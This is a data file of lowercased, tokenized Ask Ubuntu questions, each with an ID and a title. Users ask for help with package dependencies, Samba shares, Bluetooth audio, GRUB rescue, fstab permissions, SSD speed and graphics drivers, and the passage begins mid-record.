: the following packages have unmet dependencies : unity-plugin-scopes : depends : libunity-scopes3 ( > = 0.6.0+14.10.20140804.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ( click-ubuntu-sdk-14.10-armhf ) root @ hafmed-hp-probook : /home/haf-med # please help me what i can do to resolve the problem
520891	samba share not in smb.conf	i 'm creating a new file server for a customer , and decided to load the kde desktop so that the customer could manage shares and not have to use the cli . i set up samba and shared 3 folders through the smb.conf file , then figured i 'd try to share a file from the gui . so i right clicked on the folder i wanted to share , and selected the share options and just like that i had an additional shared folder . i then went back to the smb.conf file at /etc/samba/smb.conf and wanted to see what `` options '' sharing through the gui did to the file , and ... what i expected to see in the smb.conf file was not there , the folder is shared , but it 's not shared or configured from the smb.conf file . where are the options set for a shared folder when you create a file share from the gui ? i 'm stumped .
520898	how to modify program search path ?	i am new to linux and ubuntu and i have recently encountered a problem . previously whenever i typed the name of a program that was not installed in the terminal , i would get a list of suggested packages to `` sudo apt-get install '' . recently however , whenever i type a program in to try and install it , the terminal just says bash : /usr/bin/python : no such file or directory i 'm pretty sure the reason why it 's doing this is because a while back i wanted to be able to execute python scripts in python 3 without having to explicitly type in python3 , but whenever i typed in python it just executed the python 2 interpreter . i think the file python was a symbolic link pointing to the python2 executable and i tried to change it to the python 3 executable , but somehow i screwed up and now whenever i type in a program that 's not installed , it just displays the above message instead of suggesting a package . i 'm not sure how to fix this so i was wondering it anyone could help . i 'm using ubuntu 12.04 .
520900	how to do partition in ubuntu 14.04 ?	how do i partion my hardisk in ubuntu and im having having a single partion , only one drive , the main problem is i could not parrtition my home drive by staying in home drive itself and i could not enter into bios ( i have tried all possible ways ) please help ? edit
520902	poor sound with bluetooth audio speaker	i went accross many subjects but i could not find an answer useful to me . i recently bought bluetooth speakers ( samson bt3 ) which work very well with old or new smartphones ( htc chacha and xperia z1 tested ) . the sound is good , undisjointed . however , with my laptop running ubuntu 14.04 , the sound is good for the first 10 minutes or so then it becomes really bad , mainly because it 's disjointed . i tried to play 320kbps music instead of flac ones but i did n't notice any improvements . i also verified that the problem did n't come from rythmbox . i searched on google `` poor sound quality with bluetooth speakers ubuntu '' then 'force a2dp ubuntu '' but i did n't found something useful . indeed , i think that it 's the a2dp protocol that is not activated , even if when i prompted pacmd list-sinks in terminal it said bluetooth.protocol = `` a2dp '' , which appears strange to me because in every other tests i made with smartphones it worked perfectly . two more things that might be useful to a providential helper around here : in sound settings , i ca n't define the audio quality . i have the same problem this person had : bluetooth high quality support gone in ubuntu 14.04 ? . i tried to unpair from pc - pair to my phone - pair to pc but it did n't work after 7-8 tries . i added in /etc/bluetooth/audio.conf , disable=headset as suggested in some posts , but it finally did n't resolved my problem . any piece of advice would be greatly welcomed . please excuse me if my english is not good . thanks for reading !
520904	ram vs ubuntu probem	i have a problem with ubuntu 's memory management . i am running 32-bit ubuntu 13.10 . my system is only running chromium . however , when i run free -m , it returns : total used free shared buffers cached mem : 5861 4525 1336 0 638 3385 -/+ buffers/cache : 500 5360 swap : 0 0 0 i can not find why there is so much memory being used . why is this ?
520905	gnome 3 and multiple monitors - parts of the screens staying black	i 've got a radeon hd 7870 , and ubuntu 14.04 ; it 's running fine with software drivers , but i 'm trying to get some acceleration running . ideally i would get both my monitors running ( both attached by dvi , one has a resolution of 1920x1080 , the other of 1280x1024 ) . it used to work fine under 13.10 ( but i 'm not sure anymore whether i was using gnome3 there or unity ) , but all tries to get this running properly under 14.04 and gnome3 so far were unsuccessful . there 's these really weird issues : when i use fglrx , and configure my secondary monitor , the right part of the primary monitor and the whole secondary monitor stay black ; only the big `` 2 '' in white font in the red rectangle identifying the screen , and the mousecursor is shown . if i move any window there , it simply is n't shown , the screen stays blank except for the mousecursor . because the display itself shows something i 'm suspecting this is somehow a gnome3 issue . even interaction seems to still work in the black area , at least the mouse cursor changes for a region where there should be a link in a browser , and the region is clickable and reacts normally . so `` just '' the rendering seems to be affected . i tried doing the switch using both the amd catalyst control center and the `` display '' option from the system settings , there is no difference in the outcome . is there some way to tell gnome to properly use the whole first display and the second monitor ? using a different window manager or something ? an `` analog '' screenshot of the situation ( a `` real '' screenshot wo n't show the problem - it shows what would be the expected output , namely a fully drawn screen without a black bar ) : when i deactivate a monitor ( so that only one monitor is enabled ) - then , in addition to the black bar on the right side , i occasionally ( e.g . after the switch itself ) get strange , seemingly random , flickering bar effects . any hints ? or what more information do i need to provide to fix this ? using software drivers is not really an option since only one screen works with these , and cpu usage is quite high ... edit : switched back to unity now , there everything works normally with fglrx - no regions occluded by black bars or anything ... i guess i 'm going to have to stick with that for the moment . what a pity , i really had started to like gnome 3 ...
520906	deja dup change how to restore date	i reinstalled ubuntu 12.04 on a dual boot ( w7 ) samsung laptop . when trying to restore deja dup from a usb seagate hd the only option under `` restore from when '' is today 's date , which is not valid as the new install has no files yet . on the hd i can see : '' duplicity-full.20140822t100200z.vol3 '' to vol 141 and an rdiff-backup-data folder so assume i have a viable backup . how can i fix this . please keep in mind i am a newbie ( hence the need to re-install the os ) . all assistance gratefully received and appreciated .
520907	bootorder in efibootmgr does not show os-specific options	how can i set ubuntu/grub as the active default boot option ? my computer automatically boots to windows . here is image of the efibootmgr output : i 'm running hp envy dv6 with intel core i7 and i want to dual boot windows 8 and ubuntu 14.04 .
520913	being taken to apache index page not my enabled site	basically i 'm being taken to the basic apache2 startup page instead of the site i have enabled . is there something i need to adjust so as apache will be taken to the site i have enabled i created a new .conf file pointing to the files i want displayed and enabled the site . but i keep being sent to html/index instead any help would be appreciated as i am very new to ubuntu
520921	laptop wo n't start after unsuccessful hibernation	i have a acer aspire 5560g and i installed ubuntu 14.04.1 on it using the wipe the entire disk option . everything was working fine and i decided to enable the hibernate option on my laptop . i used the sudo pm-hibernate command the first time just to check if it was hibernating properly and it was n't successful so i had to press the power button for 3-4 seconds to shut it down . the next time i opened my laptop , i get the two options as usual- ubuntu and advanced options for ubuntu . when i select ubuntu , all i get is a plain pink-ish screen and it 's stuck at that . apart from this , i ca n't even access my bios settings or boot menu order using f2 or f12 which i was able to do earlier .
520924	how do i combine hundreds of folders using command line	i have 535 folders ( `` recup_dir.1 '' , `` recup_dir.2 '' , ... , `` recup_dir.535 '' ) and i want to merge ( combine ? ) the contents of those folders into a single folder ( lets say a folder named `` recup_dir '' ) . some files might have identical names ( like `` img.jpg '' ) , they should't overwrite the existing ones ( instead they should be renamed to something like `` img1.jpg '' , `` img2.jpg '' and so on ... ) . is there a way to do such thing using the command line ?
520925	how to remotely control ubuntu 14.04 via ssh	i have ( indirect ) ssh access to the machine and a user is currently logged in physically . i want to get access to the physical screen . how ? there are many related question , but none really help me : remote login . i already have installed remote-login-service . not sure what to do now . remote control . no answers . remote desktop . list of solutions . does n't really answer my question . remote desktop , more . list of solutions . does n't answer my question . remote desktop , 14.04 . does n't really answer my question . and more ...
520926	ubuntu 14 ctrl key seems to be logically stuck	i just installed ubuntu 14.04 lts and the ctrl key seems to be logically stuck , basically preventing me from using ubuntu . it seems to be intermittent at times and then at other times the problem only starts after a while of using the distro and sometimes the problem appears straight away . hardware specs : cpu - intel core i7 ram - 8gb single-channel ddr3 mobo - gigabyte h77m-d3h gpu - nvidia geforce gt 630 keyboard - corsair vengeancve k-90 mouse - microsoft wireless mouse 5000 is there any sort of workaround for this problem ? i 've been checking from other forums and this problem seems to have been around for a while , cropping up with various versions of ubuntu .
520928	ubuntu firefox homepage temporarily showing arabic	i 've noticed this evening that the default ubuntu firefox homepage on ubuntu 12.04 momentarily displayed arabic in the titlebar and for the links . this first happened 15 mins ago then i rebooted and tried again - still arabic . just now i 've tried one more time and it 's now gone back to english . no other application on my system ( e.g . chrome or the console ) is displaying any arabic and i 've double checked my localisation settings and it 's still english uk . also when i visited any other page on firefox ( e.g the normal google search page , http : //www.google.co.uk ) the normal english page showed , not an arabic version . any ideas on this one ? guessing it might have been a problem server side as it was the server-generated content showing arabic - nothing client-side - as it seems to have sorted itself out just now ... but just thought i 'd check . have deleted all my cookies just in case it was an attempted xss attack or something like that - but i have n't been doing anything silly so i 'd suspect not . it 's 12.04 , more or less up-to-date ( just updated 5 packages now from last week , so now completely up-to-date ) , and localisation is english uk . thanks , nick
520930	how to convert softsub video file to hardsub video file ?	how to convert soft-sub video file to hard-sub video file ? i have many mkv video files but i ca n't watch this videos because the subtitles donât appear so i want to convert this files to hard-sub without changing subtitles fonts or anything in this videos . is there any way to do it ?
520931	install ubuntu to thinkpad t540	i tried to install ubuntu to thinkpad t540 , the default image throw system halt error . i found special release for this notebook , but i coud n't download this . where can i find iso for this release ?
520934	delete vpn and use normal network connection	install linux on dell 1505.. it does not see my wifi , when setting up the network it only gives the option for vpn . i am really not interested in that much security and certainly not interested in paying monthly charges . is there a way to connect my wifi with centurylink without the vpn stuff ? everything i try will not work .
520935	formatting flash drive into a bootable drive	ive downloaded the disk image of ubuntu 14.1 and am now attempting to format my flash drive to be able to transfer the disk image and be able to run it . the problem i have run into is turning the usb into a bootable drive via command prompt . ive created a partition on the drive , however i seem to be unable to select the partition to assign it as a mount point . these are the instructions i followed to clarify any confusion . http : //www.wikihow.com/make-a-usb-bootable
520937	ubuntu 12.04 to 14.04 nvidia driver conflict	my notebook is asus u36 which has two video cards . one is cpu integrated intel 3000 and the other is nvidia corporation gf119m [ geforce gt 520m ] . when i do not install nvidia driver , there is a problem that the mouse cursor will disappear or appear from time to time . when i install nvidia driver from ubuntu 's `` additional drivers '' , ubuntu will suspend after it 's running a random time . ubuntu will not accept anything except `` ctrl + alt + f1 '' to poweroff or reboot . when i install nvidia driver downloaded from nvidia 's official website . ubuntu can not display desktop after login . from ubuntu 12.04 to 14.04 , this problem always exists . i am not sure whether it exists in 11.10 or earlier .
520939	problem with ppa : barracuda72/ralink repository	i 've upgraded from ubuntu 12.04lts to 14.04lts . my wifi/bluetooth card is of ralink . when i installed wireless driver the barracuda ppa was added ( unchecked ) and i enabled ( checked ) them as follows : now , the problem is when i run sudo apt-get update & & sudo apt-get install build-essential linux-headers-generic in terminal the output is as follows : ign http : //mirror.de.leaseweb.net trusty inrelease ign http : //ppa.launchpad.net trusty inrelease hit http : //mirror.de.leaseweb.net trusty release.gpg ign http : //ppa.launchpad.net trusty release.gpg hit http : //mirror.de.leaseweb.net trusty release ign http : //ppa.launchpad.net trusty release hit http : //mirror.de.leaseweb.net trusty/main sources hit http : //mirror.de.leaseweb.net trusty/restricted sources hit http : //mirror.de.leaseweb.net trusty/universe sources hit http : //mirror.de.leaseweb.net trusty/main i386 packages hit http : //mirror.de.leaseweb.net trusty/restricted i386 packages hit http : //mirror.de.leaseweb.net trusty/universe i386 packages hit http : //mirror.de.leaseweb.net trusty/main translation-en hit http : //mirror.de.leaseweb.net trusty/restricted translation-en hit http : //mirror.de.leaseweb.net trusty/universe translation-en err http : //ppa.launchpad.net trusty/main sources 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //mirror.de.leaseweb.net trusty/main translation-en_us ign http : //mirror.de.leaseweb.net trusty/restricted translation-en_us ign http : //mirror.de.leaseweb.net trusty/universe translation-en_us w : failed to fetch http : //ppa.launchpad.net/barracuda72/ralink/ubuntu/dists/trusty/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/barracuda72/ralink/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . where is the problem ?
520944	ubuntu not booting properly , or mounting properly ... or installing updates properly	for the past couple days , following an attempt to update the os , my computer shows this on boot-up : the only reason i 'm using it right now is that i booted up from an older version , but i 've had problems with installing new version before , and also getting error messages like this : i believe i 've also had problems removing old ones through the terminal . anyways , what 's the best route at this point ? edit : understanding it as a kernel panic , i managed to get some info on my boot files . here 's what came up . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . sda1 : ______________________________________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : boot files : /grub/grub.cfg sda2 : ______________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : ______________________________________________________________________ file system : crypto_luks boot sector type : unknown boot sector info : ubuntu-vg-root ' : ___________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' ubuntu-vg-swap_1 ' : _________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 499,711 497,664 83 linux /dev/sda2 501,758 1,953,523,711 1,953,021,954 5 extended /dev/sda5 501,760 1,953,523,711 1,953,021,952 83 linux '' blkid '' output : ________________________________________________________________ device uuid type label /dev/mapper/sda5_crypt mlmv6i-emlw-vtk7-irqk-qnrh-whxk-vlqrff lvm2_member /dev/mapper/ubuntu -- vg-root 5077026c-b631-4601-b0e9-fc228c6860e9 ext4 /dev/sda1 8fb7c16b-f131-4622-86f0-e3a54e5272c3 ext2 /dev/sda5 37bfa81a-5253-4b9e-bfb3-963476e52b17 crypto_luks ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control sda5_crypt ubuntu -- vg-root ubuntu -- vg-swap_1 ================================ mount points : ================================= device mount_point type options /dev/mapper/ubuntu -- vg-root / ext4 ( rw , errors=remount-ro ) /dev/sda1 /boot ext2 ( rw ) ============================= sda1/grub/grub.cfg : ============================== specs : memory : 3.9 gib processor : intel® core™2 quad cpu q8300 @ 2.50ghz × 4 graphics : gallium 0.4 on nv96 os : 64-bit disk : 980.1 gb ( and yet it says i do n't have enough space in boot )
520946	does all extensions that work on windows work on ubuntu ?	i 'm new user of ubuntu and i wan na know if the extensions that run on win platform can be ran on ubuntu plat form ?
520947	chinese checking-hard-disk-message incorrectly displayed	when ubuntu is blocked by certain unknown cause , i have to press the power key to force my computer power off . in this case , when ubuntu is rebooted , it will check hard disks . before 11.10 those checking-hard-disk-message is displayed in english even ubuntu is in chinese version . after 12.04 ( i am not sure ) and later version , those message is displayed in squares with 4 digits in each square . i guess those are incorrectly displayed chinese characters .
520948	initramfs - unable to find a medium containing a live file system , ubuntu 14.04.1	i ca n't install ubuntu 14.04.1 in my desktop . when i try to boot i get this message : initramfs - unable to find a medium containing a live file system .
520951	ubuntu setup is downloading torrent iso , while installing	i am installing ubuntu 14.04 lts in my windows 7 home premium using wubi.exe . the problem i am facing is that after input the username and password window , its start the downloading of ubuntu 14.04 amd x64 iso torrent . and this is happening to all ubuntu version . it was working fine earlier . but recently i have replaced my hdd . any help ?
520952	how to record user input to a file in a shell script ?	my friend was showing me a program in shell script where he made where he would open the program , it would ask a question , he would type an answer . then it would close but whatever he typed as the answer would be transferred to a text document .
520953	error : no such device grub rescue windows 7	i have a hard drive with windows 7 installed on and i wanted to install ubuntu 12.04 onto an external hard drive . so i made a liveusb with ubuntu 12.04 on and installed it to the external hard drive . i then deleted the partition and re-formatted the external hard drive that had ubuntu on . when i go to turn on my laptop now ( with the windows 7 hard drive ) i get this . error : no such device : c74908d5-9525-4fdc-a89a-cfa380052200 . entering rescue mode ... grub rescue > ls ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) grub rescue > i do not have the original disk that contained the windows 7 os on , i have seen from other forums that this can be used to repair the boot loader for windows . so obviously i am in a sticky situation . i have another external hard drive with ubuntu 14.04 on and when i connect an external hard drive case with the windows 7 hard drive on . i can access these folders from ubuntu 14.04 . system : windows : if anyone has any help as to how i can fix this problem , i would greatly appreciate it .
520954	suggestions about which version to use	i am using asus motherboard m2n-mx see plus and amd athlon 64 x2 processor on my desktop . which version of ubuntu for my system , and it will also let me install the graphics card software on it . thank you .
520955	wifi not working script included	as per other answer of related question i did what they want me to do that pasting the script of the wifi problem in ubuntu 14.04 now here the link of the script http : //pastebin.ubuntu.com/8273107/ please help me soon as possible what i have to do now.. thank you
520957	are there differences between ubuntu server 12.04 and 14.04 in network configuration during the installation ?	i decided to turn my old laptop into a server just to learn about servers and linux . i installed the ubuntu server 12.04 , i chose my wireless connection during the installation and i installed the basic ubuntu server and openssh packages . after the installation i just needed to run dhclient -r and /etc/init.d/networking restart to get access to internet . after , i did the same to install the server 14.04 . although , wlan0 was n't showing with ifconfig and neither was displayed at the /etc/network/interfaces . is there a reason why 12.04 saved the connection configuration from installation and 14.04 did n't , or did i do something wrong ?
520958	unity 's messaging menu ( indicator ) in gnome shell	is there any way to use the messaging menu from unity in gnome shell ? i 've tried the appindicator gnome shell extension , but that does not seem to work for the messaging menu .
520959	how to find the package name to install an app using terminal ?	the install button of the software center of my ubuntu 14.04 is disabled for unknown reason . so i want to install softwares using terminal . but i do n't know the package name . so how i get the package name ? n.b : i can see the details of a software using software center .
520960	ssd performance testing	i 'm testing the performances of my new ssd card , and it seems i 'm stuck with sata2 speed even if my controller is sata3 . here is the command i 'm using . dd if=tempfile of=/dev/null bs=1m count=1024 1024+0 records in 1024+0 records out 1073741824 bytes ( 1,1 gb ) copied , 0,309558 s , 3,5 gb/s i got 3,5gb/s even if my device is sata3 : dmesg | grep sata [ 7.035956 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x5 impl sata mode [ 7.051861 ] ata1 : sata max udma/133 abar m2048 @ 0xf7a16000 port 0xf7a16100 irq 43 [ 7.051866 ] ata3 : sata max udma/133 abar m2048 @ 0xf7a16000 port 0xf7a16200 irq 43 [ 7.368593 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 7.368621 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) hdparm -ii /dev/sda | grep sata transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 here is my controller : lspci | grep sata 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) this is the hdparam test : hdparm -i /dev/sda | grep -i speed * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) partition alignment should be ok ( i 'm not 100 % sure ) . ( parted ) p model : ata samsung ssd 840 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 92,9gb 92,9gb primary ext4 4 92,9gb 94,0gb 1128mb primary ext4 boot 2 94,0gb 241gb 147gb primary ext4 3 241gb 250gb 9222mb primary linux-swap ( v1 ) ( parted ) align-check opt 1 1 aligned ( parted ) align-check opt 2 2 aligned ( parted ) align-check opt 3 3 aligned ( parted ) align-check opt 4 4 aligned bios is configured correctly with ahci my laptop is an asus a55vd , ssd is samsung evo 840 . why i 'm having 3gb/s instead of 6gb/s ? is perhaps my disk alignment not correct ? thanks
520962	drive permissions problem	under fstab i have assigned a drive 777 permissions ( umask 000 ) and the permissions say 777 in the gui . i created a new user and gave it the gid for the drive as well as admin privileges to be safe but the new user still does not have permission to open the drive . any ideas ?
520963	how come the locate command does n't find obvious files ?	the locate command sounds intuitive . i would expect it to locate files on the filesystem . however , it rarely finds files on the system that are indeed present : $ locate ipsec.secrets this gives no results , even when run from filesystem root directory / . the file is indeed present : $ whereis ipsec.secrets ipsec : /usr/sbin/ipsec /etc/ipsec.secrets /etc/ipsec.d /etc/ipsec.conf /usr/lib/ipsec /usr/share/man/man8/ipsec.8.gz why was locate unable to find this file ?
520964	i 'm trying to install vga driver for s3 virge	and thank you in advance . i have downloaded xserver-xorg-video-s3virge_ 1.10.4 orig.tar.gz , and extracted contents , which gives me xf86-video-s3virge-1.10.4 . ( both files are sitting in my downloads folder ) . when i run sudo apt-get install xserver-xorg-video-s3virge , i get the following message e : unable to locate package xserver-xorg-video-s3virge . where do i put xserver-xorg-video-s3virge_1.10.4.orig.tar.gz so sudo apt-get install can find it ? is there a program i need to enable ubuntu to find and install this driver ?
520965	configuration of wireless adapter	i just installed ubuntu 14.04 and have tried to configure the adapter which is a linksys wusb6300 , but seem to have no response . i have tried using the startup cd to activate the adapter but seem to get only errors .
520969	jekyll not respecting _config.yml -- possible to upgrade ?	ubuntu 14.04 | default ruby 1.9.1 | jekyll 0.11.2 jekyll is n't respecting a number of my settings in _config.yml . i 'm guessing this is because current jekyll ( gem ) version is 2.3.0 , but i could be wrong . the specific settings being ignored are : pagination destination both of these problems mess with the urls created by jekyll . is there a way to either : safely update jekyll to the current version ( not break ubuntu ) ? force jekyll to recognize my settings ?
520972	ubuntu 14.04 install cuda 6.5 no desktop	my notebook is asus u36 which has two video cards . one is cpu integrated intel 3000 and the other is nvidia corporation gf119m [ geforce gt 520m ] . installing cuda 6.5 ( downloaded from nvidia 's official website ) in ubuntu 14.04 will cause ubuntu lost desktop after login . why ?
520973	why is n't unity integration working with firefox ?	i have heard about webapp integration . you know , like when you go to a website like youtube and you can adjust the video 's volume by clicking the sound icon on that bar that 's always at the top of your screen . i have checked firefox 's addon settings and it says that the addons are enabled . i go to google docs , last.fm , youtube , everything and it does n't work with ubuntu 14.04 . why ?
520975	no display after wake up . using 14.04.1 + xfce4	basic info : completely fresh install of ubuntu 14.04.1 on an hp pavilion g4-1303au laptop , by bootable usb . iso image was downloaded on 05 september , 2014 through torrent acquired from the official ubuntu website . installed xfce by : sudo apt-get install xfce4 issue : display does n't get powered on when waking up from suspend , regardless of how the system was suspended ( lid close or 'suspend ' option in gui ) , or which session ( unity or xfce ) is running . the system runs perfectly fine , other than the screen being off . i 'm able to log in , use the mouse to click on objects , run applications , and more ; just without seeing what is happening . solutions attempted : system update uninstalled xscreensaver , then installed light-locker , then toggled and applied 'lock on suspend ' setting twice uninstalled light-locker , installed xscreensaver opened tty1 from the blacked out screen , logged in , and restarted the lightdm service set up a keyboard shortcut to run the following command on wake up , as described here # ! /bin/sh xrandr -- output lvds1 -- mode 1366x768 -- pos 0x0 -- rotate normal -- output vga1 -- off system information : ram : 6gb processor : amd a4 apu video card : amd hd6480g i 'm at my wit 's end with this issue , and would greatly appreciate any help . p.s . : in general usage , the application finder in xfce takes up to a few minutes to launch , while the file manager launches immediately . is this affecting everyone ?
520977	pre-populate username and domain fields	i click one of the bookmarks to connect remotely to my home folder - initially the folder was arrived at using `` file - > connect to server '' , then the bookmark created . however , on clicking the bookmark , a popup comes with pre-populated username and domain fields . see screenshot below . is it possible to pre-populate the username and domain with whatever i want ? i do n't think it 's safe to choose the `` remember forever '' option !
520978	how to make ussd call from huawei data card e1731	i have huwai data card e1731 using as dongle on ubuntu 14.04 . now i want to make ussd calls from data card . here are few lines of 'dmesg' usbserial : usb serial support registered for gsm modem ( 1-port ) [ 23.059584 ] option 1-1.1:1.0 : gsm modem ( 1-port ) converter detected [ 23.059757 ] usb 1-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 23.059806 ] option 1-1.1:1.3 : gsm modem ( 1-port ) converter detected [ 23.059876 ] usb 1-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 23.059892 ] option 1-1.1:1.4 : gsm modem ( 1-port ) converter detected [ 23.059957 ] usb 1-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 23.068923 ] cdc_ether 1-1.1:1.1 wwan0 : register 'cdc_ether ' at usb-0000:00:1a.0-1.1 , mobile broadband network device , 02:50 : f3:00:00:00 [ 23.068951 ] usbcore : registered new interface driver cdc_ether [ 24.049305 ] scsi 14:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 24.049812 ] scsi 15:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 i tried gammu : sudo gammu getussd *123 # error opening device , it does n't exist . my gammurc device = /dev/ttyusb0 connection = mbus replaced ttyusb0 with ttyusb1 and tty usb2 but same result i tried gsm-ussd sudo gsm-ussd -m /dev/ttyusb0 ca n't get lockfile /var/lock/lck..ttyusb0 - probably already in use ! same results with other two usb1 and usb2 i tried prepaid-manager-applet with setup of vendors and country . we ca n't find the information on how to query the account balance from your provider 'airtel ' in our database . waiting for your any help..
520979	need help editing fstab and making my new hdd a system wide mount	okay so long story short . i 'm trying to set up my ubuntu 14.04 server as a time machine backup . i bought a wd red hdd to use as the hdd where the back ups save . i can see my ubuntu pc in the list of time machine back up locations but when i try to connect to it , it says `` osstatus error 2 '' after researching the error is happening most likely because my wd red drive does n't have the right permissions and its location right now is /media/server and i believe it should be /mnt/server if its a system wide mount . i tried going into the disks application but when i click on the wheel `` edit mount options '' is faded and i cant click on it . it also says `` 2.0tb unknown '' where the partitions are suppose to be . i 've read a few guides but i do n't understand how to edit the fstab file i 'm a n00b can somebody guide me through it ? the output for cat /etc/fstab ; echo ; mount ; echo ; ls -l /media/server is below ... the drive i need to make a system wide mount is /dev/sda5 /etc/fstab : static file system information . # entry for /dev/sda5 : uuid=1b9c57f11bbec3db /media/timemachine/server ntfs-3g defaults , nosuid , nodev , locale=en_us.utf-8 0 0 uuid=47e3c635-9838-4c1c-bb00-7954752f87ff none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 mount ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda5 on /media/timemachine/server type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1002/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=timemachine ) gvfsd-fuse on /root/.gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev ) ls -1 /media/server ls : can not access /media/server : no such file or directory cat /etc/fstab # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > # entry for /dev/sda6 : uuid=494aac22-8d5f-44eb-9483-04126a4d4b5e / ext4 errors=remount-ro 0 1 # entry for /dev/sda2 : uuid=949ca48c9ca46a86 /media/factory_image ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda1 : uuid=b82ecef22ecea8a8 /media/hp ntfs-3g defaults , locale=en_us.utf-8 00 # entry for /dev/sda5 : uuid=1b9c57f11bbec3db /media/timemachine/server ntfs-3g defaults , nosuid , nodev , locale=en_us.utf-8 0 0 uuid=47e3c635-9838-4c1c-bb00-7954752f87ff none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 ls -l /media/timemachine/server total 0 drwxrwxrwx 1 root root 0 sep 2 17:57 timemachine
520980	resolution problem for new dell xps 15 -9530 ubuntu 1	unable to set the font size as the resolution are quite high in xps 15 9530 due to which fonts seems very small . i am facing difficulties in working due to small fonts and small object with high resolution . even when i change resolution it does n't effect the fonts or the objects . the objects and fonts remain small only .
520981	permission denied after compiling a fortran program	after i compile a fortran code , it gives a non-executable program ( only the mode rw , not x ) . when i run it says : bash ./program permission denied if i change mode chmod u+x program , then it will give massage : bash : ./velest : can not execute binary file
520985	killing 'wineserver ' does n't close the gui of wine applications	when certain applications running under wine crash i usually just kill the process 'wineserver ' , since i am unable to properly identify specific process names with windows application ( if they even run on different processes - i 'm not sure , i know little about this stuff ) . however this accomplishes only freeing my cpu usage , since the guis are still opened and accessible through the dash , even though they are not responding . so my question is : what process should i kill to get rid of the artifacts from not-running-anymore wine programs ?
520989	lubuntu fglrx drivers not loading	i 'm running lubuntu 14.04 on my pc and it does n't seem to load the fglrx drivers , it only loads the open source drivers . i have no idea what is happening with the drivers , purge and reinstall does n't seem to do anything ( both drivers need different settings to correctly fit on my monitor ) my graphics card is an amd radeon hd 5750 thanks in advance
520992	what causes high cpu usage by mount.ntfs ?	i 'm in ubuntu 14.04 64-bit . mount.ntfs use high cpu -- 40 % . i have intel core i5-3210m . why is this happening ? lsblk : name fstype size mountpoint label sda 465.8g ├─sda1 ntfs 300m windows re tools ├─sda2 vfat 100m /boot/efi system ├─sda3 ntfs 438m windows ├─sda4 ntfs 97.7g ├─sda5 ext4 94.1g / ├─sda6 ntfs 263.3g /media/user/data1 data ├─sda7 128m └─sda8 ntfs 9.5g recovery sr0 1024m top : pid user pr ni virt res shr s % cpu % mem time+ command 26199 root 20 0 14712 1940 684 r 45.5 0.0 3:07.80 mount.ntfs 26268 user 20 0 1255660 385524 49108 s 15.3 4.8 1:01.41 firefox 28549 root 20 0 483936 130680 109148 s 12.3 1.6 11:06.58 xorg 26250 user 20 0 538956 30212 19316 s 6.0 0.4 0:22.58 gnome-syst+ 29140 user 20 0 1579488 237416 38440 s 5.3 2.9 5:56.58 compiz 8311 user 20 0 4833744 253740 25596 s 4.3 3.1 1:26.34 java 31864 user 20 0 671040 22512 13420 s 1.3 0.3 0:07.73 gnome-term+ 10 root 20 0 0 0 0 s 0.3 0.0 0:13.72 rcuos/2
520993	installation wo n't reboot but starts from shutdown , though	i have completed the ubuntu 10.04.1 dual boot installation and if i shutdown , i ca n't boot it up , again . however , if i try to reboot from within ubuntu , after i choose ubuntu os , the screen goes black and then flashes several lines of messages that say : bad 10 access at port 0x2000 , bad 10 access at port 0x2001 , bad 10 access at port 0x2002 , bad 10 access at port 0s2003 , bad 10 access at port 0x2024 ( each of these is on a separate line by itself but i could not format it that way in this question section . i will learn how to do that , eventually . ) can anyone tell me how to correct this problem so that my installation reboots all the way through to my desktop ? i looked for this problem here but could not find it . i am a newbie so if i overlooked it , please , please excuse me . i apologize . thank you very much for your help and patience .
